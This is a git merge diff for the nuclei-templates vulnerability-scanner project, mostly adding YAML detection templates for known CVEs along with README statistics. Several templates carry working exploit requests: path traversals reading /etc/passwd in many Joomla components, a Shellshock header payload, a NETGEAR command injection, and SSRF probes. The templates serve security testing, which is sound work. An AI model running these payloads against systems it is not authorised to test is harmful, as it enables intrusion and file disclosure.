Merge pull request #88 from projectdiscovery/master

Updation
2021-09-04 16:44:54 +05:30 · 2021-09-04 16:44:54 +05:30 · d01835f36f
parent aeac5bbec3 a79c616a67
commit d01835f36f
109 changed files with 2223 additions and 891 deletions
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@ -32,4 +32,5 @@ jobs:
      - name: Template Validation
        run: |
          nuclei -validate -t . -exclude .pre-commit-config.yaml
          nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
        shell: bash
--- a/README.md
+++ b/README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |   632 | dhiyaneshdk   |   245 | cves             |   640 | info     |   603 | http    |  1807 |
+| cve       |   649 | dhiyaneshdk   |   245 | cves             |   657 | info     |   610 | http    |  1833 |
-| panel     |   232 | pikpikcu      |   244 | vulnerabilities  |   283 | high     |   510 | file    |    46 |
+| panel     |   236 | pikpikcu      |   244 | vulnerabilities  |   284 | high     |   526 | file    |    46 |
-| xss       |   224 | pdteam        |   198 | exposed-panels   |   231 | medium   |   402 | network |    38 |
+| xss       |   224 | pdteam        |   198 | exposed-panels   |   235 | medium   |   406 | network |    39 |
-| exposure  |   214 | daffainfo     |   164 | exposures        |   184 | critical |   232 | dns     |    11 |
+| lfi       |   221 | daffainfo     |   176 | exposures        |   185 | critical |   232 | dns     |    11 |
-| lfi       |   207 | geeknik       |   149 | technologies     |   163 | low      |   160 |         |       |
+| exposure  |   217 | geeknik       |   149 | technologies     |   164 | low      |   160 |         |       |
-| wordpress |   203 | dwisiswant0   |   132 | misconfiguration |   125 |          |       |         |       |
+| wordpress |   205 | dwisiswant0   |   132 | misconfiguration |   125 |          |       |         |       |
-| rce       |   189 | gy741         |    72 | takeovers        |    71 |          |       |         |       |
+| rce       |   190 | gy741         |    72 | takeovers        |    71 |          |       |         |       |
-| cve2020   |   157 | madrobot      |    62 | default-logins   |    51 |          |       |         |       |
+| cve2020   |   157 | madrobot      |    62 | default-logins   |    52 |          |       |         |       |
-| wp-plugin |   136 | princechaddha |    54 | file             |    46 |          |       |         |       |
+| wp-plugin |   138 | princechaddha |    54 | file             |    46 |          |       |         |       |
-| tech      |   105 | pussycat0x    |    44 | workflows        |    35 |          |       |         |       |
+| tech      |   106 | pussycat0x    |    48 | workflows        |    35 |          |       |         |       |
-**146 directories, 1962 files**.
+**147 directories, 1989 files**.
 </td>
 </tr>
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
--- a/TOP-10.md
+++ b/TOP-10.md
@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |   632 | dhiyaneshdk   |   245 | cves             |   640 | info     |   603 | http    |  1807 |
+| cve       |   649 | dhiyaneshdk   |   245 | cves             |   657 | info     |   610 | http    |  1833 |
-| panel     |   232 | pikpikcu      |   244 | vulnerabilities  |   283 | high     |   510 | file    |    46 |
+| panel     |   236 | pikpikcu      |   244 | vulnerabilities  |   284 | high     |   526 | file    |    46 |
-| xss       |   224 | pdteam        |   198 | exposed-panels   |   231 | medium   |   402 | network |    38 |
+| xss       |   224 | pdteam        |   198 | exposed-panels   |   235 | medium   |   406 | network |    39 |
-| exposure  |   214 | daffainfo     |   164 | exposures        |   184 | critical |   232 | dns     |    11 |
+| lfi       |   221 | daffainfo     |   176 | exposures        |   185 | critical |   232 | dns     |    11 |
-| lfi       |   207 | geeknik       |   149 | technologies     |   163 | low      |   160 |         |       |
+| exposure  |   217 | geeknik       |   149 | technologies     |   164 | low      |   160 |         |       |
-| wordpress |   203 | dwisiswant0   |   132 | misconfiguration |   125 |          |       |         |       |
+| wordpress |   205 | dwisiswant0   |   132 | misconfiguration |   125 |          |       |         |       |
-| rce       |   189 | gy741         |    72 | takeovers        |    71 |          |       |         |       |
+| rce       |   190 | gy741         |    72 | takeovers        |    71 |          |       |         |       |
-| cve2020   |   157 | madrobot      |    62 | default-logins   |    51 |          |       |         |       |
+| cve2020   |   157 | madrobot      |    62 | default-logins   |    52 |          |       |         |       |
-| wp-plugin |   136 | princechaddha |    54 | file             |    46 |          |       |         |       |
+| wp-plugin |   138 | princechaddha |    54 | file             |    46 |          |       |         |       |
-| tech      |   105 | pussycat0x    |    44 | workflows        |    35 |          |       |         |       |
+| tech      |   106 | pussycat0x    |    48 | workflows        |    35 |          |       |         |       |
--- a/cves/2010/CVE-2010-1219.yaml
+++ b/cves/2010/CVE-2010-1219.yaml
@ -0,0 +1,26 @@
 id: CVE-2010-1219
 info:
  name: Joomla! Component com_janews - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/11757
    - https://www.cvedetails.com/cve/CVE-2010-1219
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1304.yaml
+++ b/cves/2010/CVE-2010-1304.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1304
 info:
  name: Joomla! Component User Status - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/11998
    - https://www.cvedetails.com/cve/CVE-2010-1304
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1305.yaml
+++ b/cves/2010/CVE-2010-1305.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1305
 info:
  name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12065
    - https://www.cvedetails.com/cve/CVE-2010-1305
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1307.yaml
+++ b/cves/2010/CVE-2010-1307.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1307
 info:
  name: Joomla! Component Magic Updater - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12070
    - https://www.cvedetails.com/cve/CVE-2010-1307
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1313.yaml
+++ b/cves/2010/CVE-2010-1313.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1313
 info:
  name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12082
    - https://www.cvedetails.com/cve/CVE-2010-1313
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1354.yaml
+++ b/cves/2010/CVE-2010-1354.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1354
 info:
  name: Joomla! Component VJDEO 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12102
    - https://www.cvedetails.com/cve/CVE-2010-1354
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1470.yaml
+++ b/cves/2010/CVE-2010-1470.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1470
 info:
  name: Joomla! Component Web TV 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12166
    - https://www.cvedetails.com/cve/CVE-2010-1470
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1476.yaml
+++ b/cves/2010/CVE-2010-1476.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1476
 info:
  name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12150
    - https://www.cvedetails.com/cve/CVE-2010-1476
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1494.yaml
+++ b/cves/2010/CVE-2010-1494.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1494
 info:
  name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12113
    - https://www.cvedetails.com/cve/CVE-2010-1494
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1717.yaml
+++ b/cves/2010/CVE-2010-1717.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1717
 info:
  name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12291
    - https://www.cvedetails.com/cve/CVE-2010-1717
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1980.yaml
+++ b/cves/2010/CVE-2010-1980.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1980
 info:
  name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12085
    - https://www.cvedetails.com/cve/CVE-2010-1980
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-1981.yaml
+++ b/cves/2010/CVE-2010-1981.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-1981
 info:
  name: Joomla! Component Fabrik 2.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12087
    - https://www.cvedetails.com/cve/CVE-2010-1981
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2010/CVE-2010-2122.yaml
+++ b/cves/2010/CVE-2010-2122.yaml
@ -0,0 +1,27 @@
 id: CVE-2010-2122
 info:
  name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/12623
    - https://www.cvedetails.com/cve/CVE-2010-2122
  tags: cve,cve2010,joomla,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2013/CVE-2013-3827.yaml
+++ b/cves/2013/CVE-2013-3827.yaml
@ -24,6 +24,7 @@ requests:
      - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
      - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/cves/2014/CVE-2014-6271.yaml
+++ b/cves/2014/CVE-2014-6271.yaml
@ -25,11 +25,14 @@ requests:
      Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
      Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
      Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
--- a/cves/2015/CVE-2015-4050.yaml
+++ b/cves/2015/CVE-2015-4050.yaml
@ -0,0 +1,27 @@
 id: CVE-2015-4050
 info:
  name: ESI unauthorized access
  author: ELSFA7110,meme-lord
  severity: high
  description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
  tags: cve,cve2015,symfony,rce
  reference:
    - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4050
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Credits"
        part: body
      - type: status
        status:
          - 200
--- a/cves/2015/CVE-2015-5461.yaml
+++ b/cves/2015/CVE-2015-5461.yaml
@ -0,0 +1,22 @@
 id: CVE-2015-5461
 info:
  name: StageShow <= 5.0.8 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
  reference:
    - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5461
  tags: redirect,cve,cve2015,wordpress,wp-plugin
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
--- a/cves/2016/CVE-2016-6277.yaml
+++ b/cves/2016/CVE-2016-6277.yaml
@ -0,0 +1,27 @@
 id: CVE-2016-6277
 info:
  name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
  author: pikpikcu
  severity: critical
  description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
  tags: cve,cves2016,netgear,rce,iot
  reference:
    - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@ -89,7 +89,7 @@ requests:
        - welcome
    attack: sniper
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2017/CVE-2017-18638.yaml
+++ b/cves/2017/CVE-2017-18638.yaml
@ -0,0 +1,24 @@
 id: CVE-2017-18638
 info:
  name: Graphite 'graphite.composer.views.send_email' SSRF
  author: huowuzhao
  severity: high
  description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
  reference:
    - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
    - https://github.com/graphite-project/graphite-web/issues/2008
    - https://github.com/advisories/GHSA-vfj6-275q-4pvm
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18638
  tags: cve,cve2017,graphite,ssrf,oob
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@ -16,6 +16,7 @@ requests:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
@ -33,8 +34,9 @@ requests:
          - '"name":'
          - '"avatar_urls":'
        condition: and
    extractors:
      - type: regex
        part: body
        regex:
-          - '"name":"[^"]*"'
+          - '"name":"[^"]*"'
--- a/cves/2018/CVE-2018-16299.yaml
+++ b/cves/2018/CVE-2018-16299.yaml
@ -4,6 +4,7 @@ info:
  name: WordPress Plugin Localize My Post 1.0 - LFI
  author: 0x_Akoko,0x240x23elu
  severity: high
  description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
  reference: https://www.exploit-db.com/exploits/45439
  tags: wordpress,cve2018,cve,lfi
--- a/cves/2018/CVE-2018-8719.yaml
+++ b/cves/2018/CVE-2018-8719.yaml
@ -0,0 +1,30 @@
 id: CVE-2018-8719
 info:
  name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
  author: LogicalHunter
  severity: medium
  description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
  reference:
    - https://www.exploit-db.com/exploits/44371
    - https://vuldb.com/?id.115817
    - https://www.cvedetails.com/cve/CVE-2018-8719/
  tags: wordpress,wp-plugin,cve,cve2018,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "[TXT]"
          - ".log"
          - "Index of"
        condition: and
--- a/cves/2019/CVE-2019-12616.yaml
+++ b/cves/2019/CVE-2019-12616.yaml
@ -18,7 +18,6 @@ requests:
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "phpmyadmin.net"
--- a/cves/2019/CVE-2019-14322.yaml
+++ b/cves/2019/CVE-2019-14322.yaml
@ -12,6 +12,8 @@ requests:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/web/static/c:/windows/win.ini"
      - "{{BaseURL}}/base/static/c:/windows/win.ini"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2019/CVE-2019-15889.yaml
+++ b/cves/2019/CVE-2019-15889.yaml
@ -4,7 +4,10 @@ info:
  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
+  description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
    - https://www.cybersecurity-help.cz/vdb/SB2019041819
  tags: cve,cve2019,wordpress,xss,wp-plugin
 requests:
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@ -20,7 +20,7 @@ requests:
      ids: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2019/CVE-2019-17503.yaml
+++ b/cves/2019/CVE-2019-17503.yaml
@ -0,0 +1,30 @@
 id: CVE-2019-17503
 info:
  name: Kirona Dynamic Resource Scheduling - information disclosure
  author: LogicalHunter
  severity: medium
  description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file
  reference:
    - https://www.exploit-db.com/exploits/47498
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17503
  tags: cve,cve2019,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/osm/REGISTER.cmd"
      - "{{BaseURL}}/osm_tiles/REGISTER.cmd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "DEBUGMAPSCRIPT=TRUE"
          - "@echo off"
        condition: and
--- a/cves/2019/CVE-2019-9618.yaml
+++ b/cves/2019/CVE-2019-9618.yaml
@ -8,6 +8,8 @@ info:
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
    - https://seclists.org/fulldisclosure/2019/Mar/26
    - https://www.exploit-db.com/exploits/46537
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
  tags: cve,cve2019,wordpress,wp-plugin,lfi
 requests:
@ -17,7 +19,6 @@ requests:
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
--- a/cves/2020/CVE-2019-9618.yaml
+++ b/cves/2020/CVE-2019-9618.yaml
@ -1,26 +0,0 @@
 id: CVE-2019-9618
 info:
  name: GraceMedia Media Player 1.0 - Local File Inclusion
  author: 0x_Akoko
  severity: critical
  reference:
    - https://www.exploit-db.com/exploits/46537
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
  tags: cve,cve2019,wordpress,wp-plugin,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-11547.yaml
+++ b/cves/2020/CVE-2020-11547.yaml
@ -0,0 +1,34 @@
 id: CVE-2020-11547
 info:
  name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
  author: x6263
  severity: medium
  description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
  reference:
    - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
  tags: cve,cve2020,prtg,disclosure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/login.htm?type=probes"
      - "{{BaseURL}}/public/login.htm?type=requests"
    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
        part: body
      - type: word
        words:
          - "prtg_network_monitor"
        part: body
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-28976.yaml
+++ b/cves/2020/CVE-2020-28976.yaml
@ -0,0 +1,25 @@
 id: CVE-2020-28976
 info:
  name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
  author: LogicalHunter
  severity: high
  description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
  reference:
    - https://www.exploit-db.com/exploits/49189
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28976
  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
--- a/cves/2020/CVE-2020-29395.yaml
+++ b/cves/2020/CVE-2020-29395.yaml
@ -4,6 +4,7 @@ info:
  name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
  reference:
    - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@ -13,9 +13,6 @@ info:
    - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
    - https://www.hpe.com/us/en/home.html # vendor homepage
 # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
 # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
 requests:
  - method: GET
    path:
--- a/cves/2021/CVE-2021-22145.yaml
+++ b/cves/2021/CVE-2021-22145.yaml
@ -0,0 +1,36 @@
 id: CVE-2021-22145
 info:
  name: ElasticSearch 7.13.3 - Memory disclosure
  author: dhiyaneshDk
  severity: medium
  description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
  reference:
